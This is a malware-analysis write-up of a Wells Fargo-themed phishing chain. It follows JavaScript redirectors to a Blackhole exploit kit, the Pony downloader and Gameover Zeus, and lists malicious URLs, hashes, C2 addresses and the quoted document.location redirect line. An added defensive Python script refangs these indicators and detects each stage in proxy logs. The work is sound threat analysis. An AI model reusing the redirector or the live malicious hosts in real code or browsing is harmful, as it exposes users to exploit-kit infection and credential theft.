WellsFargo – CEO Portal Statement & Notice Event

Subject:
CEO Portal Statements & Notices Event

URLs:
instafxrebatebandung[.]com/xJgSPZmH/index.html
neelhitech[.]com/qawcXa3B/index.html

WellsFargo-03212012

The text ‘View the details of this transaction online’ contains hyperlinks to the compromised websites listed above. These pages have no content of their own; each only loads the following five JavaScript files:

muzee[.]org/aYYifF1v/js.js
renneaviamentos.com[.]br/u4G9ZTQb/js.js
nowshahr118[.]com/v08jzs2k/js.js
pabloalcalde[.]com/HdU03z00/js.js
posadaeltoreno[.]com/93aHAFsx/js.js

These JavaScript redirectors contain the following document.location statement, which sends victims to a Blackhole Exploit Kit landing page at 209.59.217.101:
document.location='hxxp://closteage.com/showthread.php?t=d7ad916d1c0396ff';

It first drops the Pony downloader from the following location:
closteage[.]com /q.php?f=ba33e&e=2

File: readme.exe
MD5: 659382f4192ef5070016b996e94b4646
Size: 2,83,160 bytes

Pony downloader posts to its dropzone at 176.28.18.135 /pony/gate.php. It was also configured to download the following four files, all of which are the same Gameover Zeus payload:

1. derya34[.]com/M7R7.exe
2. http://www.procontracts.co[.]za/dnhoLD.exe
3. alimujtaba.purelogics[.]info/Jq3v.exe
4. http://www.e-gaming[.]cz/qNrkMGD.exe

It then installs Zeus in %APPDATA%, with the following properties:

File: uxnab.exe
MD5: 5d4fabfef89a31dd87834a8d714f1323
Size: 2,83,160 bytes
Other: This file is digitally signed by '5r6Io0OJu3L2'
Company Name: Twain Working Group
File Description: Twain.dll Client's 32-Bit Thunking Server
File Version: 1,7,0,0
Internal Name: Twunk_32
Original Filename: Twunk_32.exe
Product Name: Twain Thunker
Timestamp: 2011:10:11 15:07:46+02:00

This Gameover Zeus payload exfiltrated stolen data to its dropzone at 188.159.215.128:26650 /index.php.
The payload had a bot id of "NR21" and a cid of "3005". Webinjects were pulled from the same proxy at 87.97.164.223:22005.
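The two detection opportunities in this chain are the bare document.location redirectors (the js.js hops described above) and the proxy traffic to the exploit kit, the Pony dropzone and the Zeus C2. The script below is an added example written for this write-up, not code from the original post or from any vendor tool: it refangs the indicators listed above, flags a script whose only effect is bouncing the browser to another host, and labels each stage of the chain in a constructed set of proxy log lines (the log format, timestamps and client address are assumptions, not captured data).

```python
"""Defender-side triage for the phishing -> js.js -> Blackhole -> Pony -> Zeus chain.

Added example, not from the original write-up. Indicator values are copied from
the post above and kept defanged; the JavaScript and log lines are constructed."""
import re
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Defanged indicators taken from the write-up above.
REDIRECTOR_HOSTS = {
    "muzee[.]org", "renneaviamentos.com[.]br", "nowshahr118[.]com",
    "pabloalcalde[.]com", "posadaeltoreno[.]com",
}
EXPLOIT_KIT_HOSTS = {"closteage[.]com"}            # Blackhole landing + q.php payload
C2_NETLOCS = {"176.28.18.135",                      # Pony gate.php
              "188.159.215.128:26650",              # Zeus dropzone
              "87.97.164.223:22005"}                # Zeus webinject proxy


def refang(indicator: str) -> str:
    """Turn a defanged indicator (or snippet) back into its matchable form."""
    return indicator.replace("[.]", ".").replace("hxxp", "http").strip()


IOC_HOSTS = {refang(h) for h in REDIRECTOR_HOSTS | EXPLOIT_KIT_HOSTS}
IOC_NETLOCS = {refang(n) for n in C2_NETLOCS}

# A quoted URL assigned to document.location, the exact form the js.js files used.
DOC_LOCATION_RE = re.compile(r"""document\.location\s*=\s*(['"])(.*?)\1""")


def extract_redirect_targets(js_text: str) -> List[str]:
    """Return every URL the script assigns to document.location."""
    return [m.group(2) for m in DOC_LOCATION_RE.finditer(js_text)]


def is_bare_redirector(js_text: str, serving_host: str) -> bool:
    """True when the script does nothing except send the browser to another host.

    serving_host is the host the script was fetched from; a same-host redirect
    is ordinary site behaviour and is not flagged."""
    targets = extract_redirect_targets(js_text)
    if not targets:
        return False
    # After removing the redirect statements only whitespace/semicolons may remain.
    remainder = DOC_LOCATION_RE.sub("", js_text)
    if re.sub(r"[\s;]", "", remainder):
        return False
    return any(urlparse(t).hostname != serving_host for t in targets)


# Assumed proxy log layout: "<epoch> <client> <METHOD> <url> <status>".
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d+)$")


def classify_log_line(line: str) -> Optional[str]:
    """Label a log line with the stage of the chain it matches, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    u = urlparse(m.group("url"))
    host = u.hostname or ""
    if host in IOC_HOSTS and u.path.endswith("/js.js"):
        return "redirector"
    if host in IOC_HOSTS and u.path.endswith("/q.php"):
        return "payload-download"
    if host in IOC_HOSTS:
        return "exploit-kit"
    if u.netloc in IOC_NETLOCS:
        return "c2/dropzone"
    return None


def triage(log_text: str) -> Dict[str, List[str]]:
    """Group the URLs of matching log lines by stage."""
    hits: Dict[str, List[str]] = {}
    for line in log_text.splitlines():
        label = classify_log_line(line)
        if label:
            hits.setdefault(label, []).append(line.split()[3])
    return hits


# Constructed sample data (not captured traffic); the JS body is the one quoted above.
SAMPLE_JS = "document.location='hxxp://closteage.com/showthread.php?t=d7ad916d1c0396ff';"
SAMPLE_LOG = """\
1332345600.001 10.0.0.7 GET http://muzee.org/aYYifF1v/js.js 200
1332345600.402 10.0.0.7 GET http://closteage.com/showthread.php?t=d7ad916d1c0396ff 200
1332345603.118 10.0.0.7 GET http://closteage.com/q.php?f=ba33e&e=2 200
1332345605.910 10.0.0.7 POST http://176.28.18.135/pony/gate.php 200
1332345630.200 10.0.0.7 POST http://188.159.215.128:26650/index.php 200
1332345631.000 10.0.0.7 GET http://www.example.com/index.html 200
"""

if __name__ == "__main__":
    print("bare redirector:", is_bare_redirector(refang(SAMPLE_JS), "muzee.org"))
    for stage, urls in triage(SAMPLE_LOG).items():
        print(stage, urls)
```

The redirector check is deliberately strict (nothing but the assignment may remain) because that is what distinguishes an injected js.js from a legitimate script that happens to navigate; in practice you would run it over scripts fetched from the compromised sites' paths listed above and combine the result with the log labels to reconstruct the full chain for one client.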
